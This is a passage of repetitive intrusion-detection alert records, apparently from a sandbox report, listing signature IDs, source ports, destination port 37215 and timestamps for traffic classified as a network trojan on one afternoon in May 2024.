                SID:2835222
                Source Port:54114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947214
                SID:2829579
                Source Port:41520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984761
                SID:2835222
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639729
                SID:2835222
                Source Port:56180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985398
                SID:2835222
                Source Port:44866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911153
                SID:2829579
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561980
                SID:2835222
                Source Port:33426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519841
                SID:2829579
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901923
                SID:2829579
                Source Port:47670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512045
                SID:2835222
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552049
                SID:2835222
                Source Port:50428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931989
                SID:2835222
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914181
                SID:2829579
                Source Port:60170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175655
                SID:2829579
                Source Port:38006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597873
                SID:2835222
                Source Port:46140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764252
                SID:2835222
                Source Port:37308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840123
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790953
                SID:2829579
                Source Port:50464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686747
                SID:2829579
                Source Port:40310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520969
                SID:2829579
                Source Port:47298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428285
                SID:2829579
                Source Port:47334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240717
                SID:2835222
                Source Port:55542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.735297
                SID:2829579
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837859
                SID:2835222
                Source Port:47940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654284
                SID:2835222
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074821
                SID:2829579
                Source Port:49332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705934
                SID:2835222
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209994
                SID:2835222
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231505
                SID:2829579
                Source Port:34062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981768
                SID:2829579
                Source Port:37870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521734
                SID:2835222
                Source Port:52946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032852
                SID:2835222
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321422
                SID:2829579
                Source Port:35504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873011
                SID:2835222
                Source Port:48502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180374
                SID:2829579
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815840
                SID:2829579
                Source Port:34796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717002
                SID:2829579
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464086
                SID:2829579
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598217
                SID:2829579
                Source Port:55144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381223
                SID:2829579
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770762
                SID:2835222
                Source Port:59236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610901
                SID:2829579
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933340
                SID:2829579
                Source Port:53308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075342
                SID:2829579
                Source Port:55042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896330
                SID:2829579
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557218
                SID:2829579
                Source Port:46622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575773
                SID:2829579
                Source Port:40314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668550
                SID:2835222
                Source Port:59162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675100
                SID:2835222
                Source Port:39954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814961
                SID:2835222
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983658
                SID:2835222
                Source Port:53488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163451
                SID:2835222
                Source Port:50290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279301
                SID:2835222
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270292
                SID:2829579
                Source Port:50830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596814
                SID:2829579
                Source Port:40016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640752
                SID:2835222
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227425
                SID:2835222
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597413
                SID:2835222
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796666
                SID:2835222
                Source Port:60868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517843
                SID:2835222
                Source Port:39176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765747
                SID:2835222
                Source Port:60278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815133
                SID:2829579
                Source Port:35336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561831
                SID:2829579
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378542
                SID:2835222
                Source Port:56894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421894
                SID:2829579
                Source Port:52322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890796
                SID:2829579
                Source Port:60370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443034
                SID:2829579
                Source Port:46716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614402
                SID:2835222
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544583
                SID:2829579
                Source Port:46614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231181
                SID:2829579
                Source Port:58528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.875013
                SID:2829579
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321292
                SID:2835222
                Source Port:48882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826337
                SID:2835222
                Source Port:39350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859112
                SID:2835222
                Source Port:44176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160903
                SID:2829579
                Source Port:55876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230307
                SID:2835222
                Source Port:59024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575195
                SID:2829579
                Source Port:58592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785437
                SID:2835222
                Source Port:53684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713799
                SID:2829579
                Source Port:59782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854869
                SID:2835222
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515612
                SID:2835222
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398775
                SID:2829579
                Source Port:49376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532880
                SID:2829579
                Source Port:42830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945839
                SID:2835222
                Source Port:41172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081866
                SID:2835222
                Source Port:41406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162195
                SID:2835222
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040020
                SID:2829579
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169466
                SID:2829579
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182452
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025285
                SID:2835222
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929986
                SID:2835222
                Source Port:39092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228896
                SID:2829579
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440280
                SID:2829579
                Source Port:58402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869320
                SID:2829579
                Source Port:35790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559035
                SID:2835222
                Source Port:39720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362846
                SID:2829579
                Source Port:48980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422104
                SID:2835222
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644622
                SID:2829579
                Source Port:52102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765182
                SID:2829579
                Source Port:47050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.736572
                SID:2829579
                Source Port:45150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561067
                SID:2829579
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631567
                SID:2835222
                Source Port:34142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141926
                SID:2835222
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324806
                SID:2835222
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982458
                SID:2835222
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975390
                SID:2829579
                Source Port:35308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144949
                SID:2829579
                Source Port:36950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667395
                SID:2835222
                Source Port:50560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436054
                SID:2835222
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773180
                SID:2835222
                Source Port:40572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208191
                SID:2835222
                Source Port:50774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794263
                SID:2829579
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288170
                SID:2835222
                Source Port:36442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787598
                SID:2835222
                Source Port:45178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262116
                SID:2835222
                Source Port:51926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008409
                SID:2835222
                Source Port:46424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171142
                SID:2835222
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171170
                SID:2829579
                Source Port:60204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631779
                SID:2835222
                Source Port:48194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855833
                SID:2835222
                Source Port:35758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228059
                SID:2829579
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329261
                SID:2835222
                Source Port:37878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465317
                SID:2829579
                Source Port:33138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842537
                SID:2829579
                Source Port:48264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381251
                SID:2829579
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387928
                SID:2835222
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451367
                SID:2829579
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.636247
                SID:2835222
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721938
                SID:2835222
                Source Port:60748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014419
                SID:2829579
                Source Port:51474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919182
                SID:2829579
                Source Port:36074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988675
                SID:2829579
                Source Port:40514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854726
                SID:2829579
                Source Port:53918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569360
                SID:2835222
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611474
                SID:2829579
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574620
                SID:2829579
                Source Port:47968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432470
                SID:2835222
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510882
                SID:2829579
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706311
                SID:2835222
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261986
                SID:2829579
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843362
                SID:2829579
                Source Port:43278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896519
                SID:2829579
                Source Port:55412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841831
                SID:2835222
                Source Port:37856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681944
                SID:2835222
                Source Port:46524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685631
                SID:2835222
                Source Port:37632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088580
                SID:2829579
                Source Port:58734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422231
                SID:2835222
                Source Port:43616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675018
                SID:2835222
                Source Port:55084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980296
                SID:2829579
                Source Port:44190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639069
                SID:2829579
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908089
                SID:2835222
                Source Port:59498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815594
                SID:2835222
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787636
                SID:2829579
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848922
                SID:2835222
                Source Port:40832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975014
                SID:2829579
                Source Port:59946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669310
                SID:2829579
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326423
                SID:2829579
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654078
                SID:2829579
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992970
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966877
                SID:2835222
                Source Port:56890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362560
                SID:2835222
                Source Port:41986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321371
                SID:2829579
                Source Port:40496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873678
                SID:2835222
                Source Port:39212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.368489
                SID:2829579
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465534
                SID:2835222
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957984
                SID:2835222
                Source Port:59586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422124
                SID:2829579
                Source Port:50832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465457
                SID:2829579
                Source Port:37524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779692
                SID:2835222
                Source Port:49106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262465
                SID:2835222
                Source Port:37838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035080
                SID:2829579
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981051
                SID:2829579
                Source Port:57672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612046
                SID:2835222
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605743
                SID:2835222
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948308
                SID:2835222
                Source Port:49658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520928
                SID:2835222
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168794
                SID:2829579
                Source Port:39226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278829
                SID:2835222
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222097
                SID:2829579
                Source Port:34854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111754
                SID:2835222
                Source Port:43698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263711
                SID:2835222
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767043
                SID:2829579
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331409
                SID:2829579
                Source Port:36200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571069
                SID:2829579
                Source Port:49038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551353
                SID:2835222
                Source Port:38628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180620
                SID:2835222
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465904
                SID:2835222
                Source Port:43646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806289
                SID:2829579
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782729
                SID:2835222
                Source Port:60142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369535
                SID:2829579
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568308
                SID:2829579
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660111
                SID:2829579
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935144
                SID:2835222
                Source Port:49668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036656
                SID:2829579
                Source Port:52786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421971
                SID:2829579
                Source Port:45652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728230
                SID:2829579
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911154
                SID:2835222
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321755
                SID:2835222
                Source Port:44936
                Destination Port:37215
